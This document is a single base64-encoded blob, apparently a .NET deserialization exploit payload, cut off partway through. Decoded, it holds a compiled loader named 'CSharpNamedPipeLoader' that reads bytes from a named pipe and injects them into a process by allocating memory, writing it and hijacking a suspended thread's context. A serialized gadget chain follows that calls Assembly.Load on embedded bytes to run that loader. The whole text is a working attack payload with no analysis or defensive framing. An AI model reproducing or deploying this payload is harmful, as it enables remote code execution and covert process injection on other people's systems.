AEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAEZsb2F0U2F2ZQBDU2hhcnBOYW1lZFBpcGVMb2FkZXIuZXhlAGR3U3RhY2tTaXplAG5TaXplAG5JbkJ1ZmZlclNpemUAbk91dEJ1ZmZlclNpemUAZHdTaXplAHNpemUAU2l6ZU9mAFN5c3RlbS5UaHJlYWRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUb1N0cmluZwBIaWdoAGdldF9MZW5ndGgAbkxlbmd0aABFZGkAUmRpAEVzaQBSc2kATXhDc3JfTWFzawBBbGxvY0hHbG9iYWwATWFyc2hhbAB2YWwAU2V0U2VjdXJpdHlEZXNjcmlwdG9yRGFjbABkYWNsAHNhY2wAYWR2YXBpMzIuZGxsAGtlcm5lbDMyLmRsbABhc2NpaVN5bWJvbABEZWJ1Z0NvbnRyb2wAVmVjdG9yQ29udHJvbABjb250cm9sAHBhcmFtAFByb2dyYW0AU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBNYWluAGR3UmV2aXNpb24AcmV2aXNpb24AU3lzdGVtLlJlZmxlY3Rpb24AWmVybwBFYnAAUmJwAFNsZWVwAEVpcABMYXN0QnJhbmNoRnJvbVJpcABMYXN0RXhjZXB0aW9uRnJvbVJpcABMYXN0QnJhbmNoVG9SaXAATGFzdEV4Y2VwdGlvblRvUmlwAEhleER1bXAARXNwAFJzcABncm91cABTeXN0ZW0uTGlucQBDU2hhcnBOYW1lZFBpcGVMb2FkZXIAU3RyaW5nQnVpbGRlcgBscEJ1ZmZlcgBvd25lcgBWZWN0b3JSZWdpc3RlcgAuY3RvcgBEYXRhU2VsZWN0b3IARXJyb3JTZWxlY3RvcgBJbml0aWFsaXplU2VjdXJpdHlEZXNjcmlwdG9yAGxwU2VjdXJpdHlEZXNjcmlwdG9yAE14Q3NyAFN0cnVjdHVyZVRvUHRyAEludFB0cgBTZWdDcwBTZWdEcwBTZWdFcwBTZWdGcwBTZWdHcwBTZWdTcwBTeXN0ZW0uRGlhZ25vc3RpY3MAZHdNaWxsaXNlY29uZHMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAbk1heEluc3RhbmNlcwBEZWJ1Z2dpbmdNb2RlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBTZWN1cml0eUF0dHJpYnV0ZXMAYnl0ZXMARUZsYWdzAGR3Q3JlYXRpb25GbGFncwBDb250ZXh0RmxhZ3MAYXJncwBVdGlscwBnZXRfQ2hhcnMARXh0ZW5kZWRSZWdpc3RlcnMAWG1tUmVnaXN0ZXJzAEZsb2F0UmVnaXN0ZXJzAFRocmVhZEFjY2VzcwBkd0Rlc2lyZWRBY2Nlc3MAaFByb2Nlc3MAR2V0Q3VycmVudFByb2Nlc3MAR2V0UHJvY0FkZHJlc3MAbHBCYXNlQWRkcmVzcwBscEFkZHJlc3MAbHBTdGFydEFkZHJlc3MAQ29uY2F0AEZvcm1hdABXYWl0Rm9yU2luZ2xlT2JqZWN0AGxwZmxPbGRQcm90ZWN0AGZsUHJvdGVjdABmbE5ld1Byb3RlY3QARGF0YU9mZnNldABFcnJvck9mZnNldABFbnZpcm9ubWVudABkYWNsUHJlc2VudABuRGVmYXVsdFRpbWVPdXQAU3lzdGVtLlRleHQAR2V0VGhyZWFkQ29udGV4dABTZXRUaHJlYWRDb250ZXh0AGxwQ29udGV4dABMb3cAVmlydHVhbEFsbG9jRXgAVmlydHVhbFByb3RlY3RFeABFYXgAUmF4AEVieABSYngARWN4AFJjeABFZHgAUmR4AFRvQXJyYXkAVG9DaGFyQXJyYXkAUmVhZFByb2Nlc3NNZW1vcnkAV3JpdGVQcm9jZXNzTWVtb3J5AG9wX0VxdWFsaXR5AAAAW1wAXAAuAFwAcABpAHAAZQBcADYAZQA3ADYANAA1AGMANAAtADMAMgBjADUALQA0AGYAZQAzAC0AYQBhAGIAZgAtAGUAOQA0AGMAMgBmADQAMwA3ADAAZQA3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TGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBIAAAAHAAAACQQAAAAKCSgAAAAKCAgAAAAACggIAQAAAAETAAAADwAAAAYpAAAA3wNTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAUAAAABwAAAAkFAAAACgksAAAACggIAAAAAAoICAEAAAABFQAAAA8AAAAGLQAAAOYCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAWAAAABwAAAAkGAAAACTAAAAAJMQAAAAoICAAAAAAKCAgBAAAAARcAAAAPAAAABjIAAADvAVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBgAAAAHAAAACQcAAAAKCTUAAAAKCAgAAAAACggIAQAAAAEZAAAADwAAAAY2AAAAKVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuUGFnZWREYXRhU291cmNlBAAAAAY3AAAATVN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhEBoAAAAHAAAACQgAAAAICAAAAAAICAoAAAAIAQAIAQAIAQAICAAAAAABGwAAAA8AAAAGOQAAAClTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkRlc2lnbmVyVmVyYgQAAAAGOgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBwAAAAFAAAADQIJOwAAAAgIAwAAAAkLAAAAAR0AAAAPAAAABj0AAAA0U3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuQ2hhbm5lbHMuQWdncmVnYXRlRGljdGlvbmFyeQQAAAAGPgAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHgAAAAEAAAAJCQAAABAfAAAAAgAAAAkKAAAACQoAAAAQIAAAAAIAAAAGQQAAAAAJQQAAAAQkAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXICAAAACERlbGVnYXRlB21ldGhvZDADAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJQgAAAAlDAAAAASgAAAAkAAAACUQAAAAJRQAAAAEsAAAAJAAAAAlGAAAACUcAAAABMAAAACQAAAAJSAAAAAlJAAAAATEAAAAkAAAACUoAAAAJSwAAAAE1AAAAJAAAAAlMAAAACU0AAAABOwAAAAQAAAAJTgAAAAlPAAAABEIAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGUAAAANUBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGUgAAABpTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseQZTAAAABExvYWQKBEMAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCVMAAAAJPgAAAAlSAAAABlYAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChCeXRlW10pBlcAAAAuU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChTeXN0ZW0uQnl0ZVtdKQgAAAAKAUQAAABCAAAABlgAAADMAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAJUgAAAAZbAAAACEdldFR5cGVzCgFFAAAAQwAAAAlbAAAACT4AAAAJUgAAAAZeAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQZfAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQgAAAAKAUYAAABCAAAABmAAAAC2A1N5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZjAAAADUdldEVudW1lcmF0b3IKAUcAAABDAAAACWMAAAAJPgAAAAliAAAABmYAAABFU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtTeXN0ZW0uVHlwZV0gR2V0RW51bWVyYXRvcigpBmcAAACUAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSBHZXRFbnVtZXJhdG9yKCkIAAAACgFIAAAAQgAAAAZoAAAAwAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Cb29sZWFuLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmoAAAAeU3lzdGVtLkNvbGxlY3Rpb25zLklFbnVtZXJhdG9yBmsAAAAITW92ZU5leHQKAUkAAABDAAAACWsAAAAJPgAAAAlqAAAABm4AAAASQm9vbGVhbiBNb3ZlTmV4dCgpBm8AAAAZU3lzdGVtLkJvb2xlYW4gTW92ZU5leHQoKQgAAAAKAUoAAABCAAAABnAAAAC9AlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW